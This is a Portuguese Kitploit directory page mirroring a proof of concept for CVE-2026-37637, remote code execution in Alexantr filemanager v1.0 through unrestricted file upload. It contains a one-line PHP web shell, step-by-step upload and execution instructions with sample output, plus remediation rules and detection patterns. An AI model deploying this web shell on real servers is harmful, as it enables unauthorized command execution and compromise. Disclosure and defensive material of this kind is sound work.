Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-37637 — Execução Remota de Código no Alexantr filemanager v1.0 via upload de arquivo sem restrições | Kitploit
Ferramentas/GitHubGitHub/slo-cyber-sec/cve-2026-37637
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Execução Remota de Código no Alexantr filemanager v1.0 via upload de arquivo sem restrições

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-37637

Prova de Conceito para CVE-2026-37637 - Execução Remota de Código no Alexantr filemanager v1.0 via upload de arquivo sem restrições em filemanager.php.

Visão Geral

CVE-2026-37637 é uma vulnerabilidade de Execução Remota de Código que afeta o Alexantr filemanager v1.0.

A vulnerabilidade existe no componente filemanager.php devido à validação insuficiente dos arquivos enviados. Um atacante remoto pode enviar um arquivo PHP malicioso para um diretório acessível pela web e executar comandos arbitrários no servidor.

Status do CVE: Enviado à MITRE
Pesquisador: CYBER-SEC Repositório do fornecedor: https://github.com/alexantr/filemanager


Resumo da Vulnerabilidade

ItemDescrição
ID do CVECVE-2026-37637
Tipo de VulnerabilidadeExecução Remota de Código
Produto AfetadoAlexantr filemanager
Versão Afetadav1.0
Componente Vulnerávelfilemanager.php
Vetor de AtaqueRemoto
Autenticação NecessáriaDepende da implantação/configuração
ImpactoExecução arbitrária de comandos
Causa RaizUpload de arquivo sem restrições e falta de validação de arquivos no lado do servidor

Impacto

Um atacante pode enviar um arquivo PHP malicioso através da funcionalidade de upload de arquivos. Como os arquivos enviados são armazenados em um local acessível pela web e a execução de PHP é permitida, o atacante pode executar comandos arbitrários do sistema no servidor.

A exploração bem-sucedida pode permitir que um atacante:

  • Execute comandos arbitrários no servidor
  • Leia arquivos sensíveis
  • Modifique ou exclua arquivos da aplicação
  • Envie malware adicional ou web shells
  • Avance para o ambiente de hospedagem
  • Comprometer totalmente o servidor afetado

Detalhes Técnicos

A aplicação permite que usuários enviem arquivos arbitrários sem validar adequadamente a extensão do arquivo, o tipo MIME ou o conteúdo do arquivo.

Um arquivo PHP malicioso como o seguinte pode ser enviado:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Uma vez enviado para um diretório acessível pela web, o atacante pode executar comandos acessando o arquivo pelo navegador e passando comandos através do parâmetro cmd.

Exemplo:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

Isso resulta na execução de comandos no sistema operacional subjacente.


Passos para Reproduzir

1. Clone a aplicação vulnerável

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. Inicie o servidor de desenvolvimento PHP

root@kitploit:~
php -S localhost:8000

3. Acesse a aplicação

Abra a aplicação em um navegador:

root@kitploit:~
http://localhost:8000/filemanager.php

Dependendo da implantação ou configuração, a aplicação também pode ser acessada através de:

root@kitploit:~
http://localhost:8000/pheditor.php

4. Envie um arquivo PHP malicioso

Crie um arquivo chamado shell.php:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Envie o arquivo usando a funcionalidade de upload da aplicação.

5. Execute um comando

Após enviar o arquivo, acesse-o diretamente pelo navegador:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

Se a exploração for bem-sucedida, o servidor executará o comando e retornará a saída.

Exemplo de saída:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Prova de Conceito

Payload PHP Malicioso

root@kitploit:~
<?php system($_GET['cmd']); ?>

Exemplo de Requisição

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

Resultado Esperado

O comando fornecido através do parâmetro cmd é executado no servidor.


Causa Raiz

A vulnerabilidade é causada pela validação insuficiente no lado do servidor na funcionalidade de upload de arquivos.

A aplicação não restringe adequadamente:

  • Extensões de arquivo
  • Tipos MIME
  • Conteúdo do arquivo
  • Destino do upload
  • Permissões de execução dentro do diretório de upload

Como resultado, arquivos PHP executáveis podem ser enviados e executados diretamente.


Remediação Recomendada

O fornecedor e os usuários devem implementar as seguintes proteções.

1. Bloquear Extensões de Arquivo Perigosas

Desabilitar o upload de tipos de arquivo executáveis, como:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. Usar uma Lista de Permissões

Permitir apenas tipos de arquivo esperados, por exemplo:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. Validar o Tipo MIME e o Conteúdo do Arquivo

Não confiar apenas no cabeçalho Content-Type fornecido pelo cliente.

A validação de arquivos deve ser realizada no lado do servidor.

4. Armazenar Arquivos Enviados Fora da Raiz da Web

Os arquivos enviados não devem ser diretamente executáveis ou publicamente acessíveis.

5. Desabilitar a Execução de PHP em Diretórios de Upload

Para Apache, isso pode ser feito com .htaccess:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

Para Nginx, impedir o tratamento de PHP em caminhos de upload:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. Renomear Arquivos Enviados

Use nomes de arquivo aleatórios gerados pelo servidor e remova extensões controladas pelo usuário.

7. Aplicar Controle de Acesso Adequado

Restringir a funcionalidade de upload apenas a usuários confiáveis.


Detecção

Os administradores podem procurar por arquivos PHP suspeitos enviados em diretórios acessíveis pela web.

Exemplos de indicadores:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
arquivos .php dentro de diretórios de upload

Padrões de requisição suspeitos podem incluir:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

Exemplo de entrada de log:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

Aviso Legal

Este repositório é fornecido apenas para fins educacionais e de segurança defensiva.

As informações e a prova de conceito têm como objetivo ajudar desenvolvedores, administradores de sistemas e profissionais de segurança a entender e remediar a vulnerabilidade.

Não use estas informações para atacar sistemas sem autorização explícita. O acesso não autorizado a sistemas de computador é ilegal.

O autor não é responsável por qualquer uso indevido das informações fornecidas neste repositório.


Referências

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
Baixar ferramenta